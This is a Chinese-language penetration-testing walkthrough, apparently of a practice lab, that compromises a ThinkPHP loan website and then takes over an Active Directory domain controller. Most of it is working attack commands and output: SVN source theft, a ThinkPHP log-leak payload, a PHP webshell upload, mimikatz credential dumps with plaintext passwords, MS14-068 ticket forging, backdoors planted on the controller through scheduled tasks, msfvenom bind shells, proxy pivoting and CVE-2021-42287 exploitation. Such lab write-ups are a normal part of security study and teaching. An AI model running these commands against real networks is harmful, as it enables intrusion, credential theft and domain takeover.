内网渗透思路之常规外网打点拿下域控

方法一:

网络拓扑示意图:

image-20211217211425633

信息收集:

进入web界面,发现是一个贷款网站,使用thinkphp搭建

image-20211217211559291

image-20211217211626170

使用dirsearch发现存在 .svn 泄露

image-20211217212053043

svn泄露下载源码:

使用工具下载源码:svnExploit

https://github.com/admintony/svnExploit

1
python3 SvnExploit.py -u http://www.webhack123.com/.svn/

image-20211217212647675

审计发现存在账号密码,去后台登录发现不对

image-20211217213446902

Thinkphp漏洞扫描:

使用Thinkphp漏洞利用工具,发现存在

1
2
[+] 存在ThinkPHP 3.x 日志泄露
Payload: http://admin.webhack123.com//App/Runtime/Logs/21_12_17.log

image-20211217213611567

使用thinkphp日志分析工具得到了两个hash字符串

1
2
a7d3f5b6b9448d53e4078587b7f73378a1fdfe04   # admin666
1d9f16d051848d54edbe9549efc585bc1564cb66 # qwertyuiop

image-20211217213823490

CMS 后台getshell:

admin/admin666 成功登录后台

image-20211217214025903

在后台修改允许上传的类型,然后上传php马

image-20211217214117923

哥斯拉成功连接

image-20211217214208858

内网信息收集:

使用在线杀软对比,web机器裸奔,也没打多少补丁

image-20211217214255237

1
2
3
4
修补程序:         安装了 2 个修补程序。
[01]: KB2999226
[02]: KB976902

代理监听端口上线CS:

物理机开启frps服务

image-20211217215215345

kali编辑frpc.ini, 运行代理

image-20211217215403627

msf创建监听器,ip为vpn的ip,设置绑定端口,代理端口

image-20211217215546714

生成powershell 的 payload,直接命令上线

image-20211217215853559

直接命令执行,存在乱码,将回显重定向到111这个文件,然后打开,转GBK编码,解决问题

1
2
systeminfo > 111
ipconfig >> 111

简单总结信息

1
2
3
4
5
6
域:               hackbox.com

//第二个网段
IPv4 地址 . . . . . . . . . . . . : 192.168.150.6(首选)
// DNS
DNS 后缀搜索列表 . . . . . . . . : hackbox.com

image-20211217222743903

mimikatz读取密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
	 * Username : hackbox\web
* Domain : hackbox\web
* Password : !@#Qwe456

* Username : Administrator
* Domain : WEB
* Password : T1//@1607#@

Authentication Id : 0 ; 4145089 (00000000:003f3fc1)
Session : Interactive from 2
User Name : web
Domain : HACKBOX
Logon Server : DC
Logon Time : 2021/9/16 9:27:50
SID : S-1-5-21-2005268815-658469957-1189185684-1103

判断域控:

判断域控位置, 确认域控 ip 192.168.150.254

1
2
net time /domain
shell ping dc.hackbox.com

image-20211217225509935

ms14-068获取域控主机权限

查看sid,发现不是域用户的

1
whoami /user

image-20211217230249708

使用这条命令查看这台机器存有的用户sid

1
wmic useraccount get name,sid

image-20211217230347452

MS14-068.exe 生成伪造票据
1
MS14-068.exe -u web@hackbox.com -p !@#Qwe456 -s S-1-5-21-2005268815-658469957-1189185684-1103 -d hackbox.com

image-20211217230011234

清除票据
1
mimikatz.exe "log" "kerberos::purge" exit

image-20211217230850722

票据注入
1
mimikatz.exe "log" "kerberos::ptc TGT_web@hackbox.com.ccache" exit

image-20211217231229688

成功获得域控的权限

image-20211217231331448

上线域控:

在web主机开启一个监听端口

再次回顾,发现问题是监听IP选错了,要设置和域控同网段的IP才行

image-20211217232621667

image-20211217232846287

尝试反向shell

将生成的后门上传到域控主机

1
shell copy mid.exe \\dc\c$\mid.exe

image-20211217233145598

net time查域控时间,新增定事任务。

1
2
shell net time
shell at \\dc 23:37:00 c:/mid.exe

image-20211217233731550

多次尝试发现没有上线。

尝试正向shell
开启smb监听端口

image-20211217234120651

将cs后门上传到域控
1
shell copy sm1.exe \\dc\c$\sm1.exe

image-20211217234255959

创建定时任务
1
2
shell net time
shell at \\dc 23:45:00 c:/sm1.exe

image-20211217234414513

上线域控
1
link dc

image-20211217234526730

image-20211217234637336

方法二:

web打点不再赘述,采用MSFCVE-2021-42287上线

msf生成正向shell

1
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=24444 -f exe -o bind24444.exe

image-20211218000110044

哥斯拉上传后门运行

msf开启正向shell监听

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.16.150.6
set lport 24444
run

image-20211218000612643

载入kiwi模块

image-20211218000759150

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码
1
2
creds_all
#该命令可以列举系统中的明文密码
1
2
3
kiwi_cmd
kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令
kiwi_cmd sekurlsa::logonpasswords
抓取明文密码
1
2
getsystem  # 提升到system权限
creds_all # 抓取明文密码

image-20211218001005593

查看,添加路由
1
2
3
run get_local_subnets
run post/multi/manage/autoroute
run autoroute -p

image-20211218001245847

开启socks代理
1
2
3
4
5
use auxiliary/server/socks_proxy
set version 4a
set srvhost 127.0.0.1
set srvport 30000
run

image-20211218001619337

设置kali的proxychains代理
1
2
3
4
sudo vim /etc/proxychains.conf

socks4 127.0.0.1 30000
esc :wq

image-20211218001724036

CVE-2021-42287
1
proxychains4 python3 sam_the_admin.py 'hackbox/web:!@#Qwe456' -dc-ip 192.168.150.254 -shell

我第一次运行是没问题的,写报告的时候不行了,原因大概是这个

image-20211218004621139

彩蛋:

域控的session

image-20211218005642671

image-20211218005933678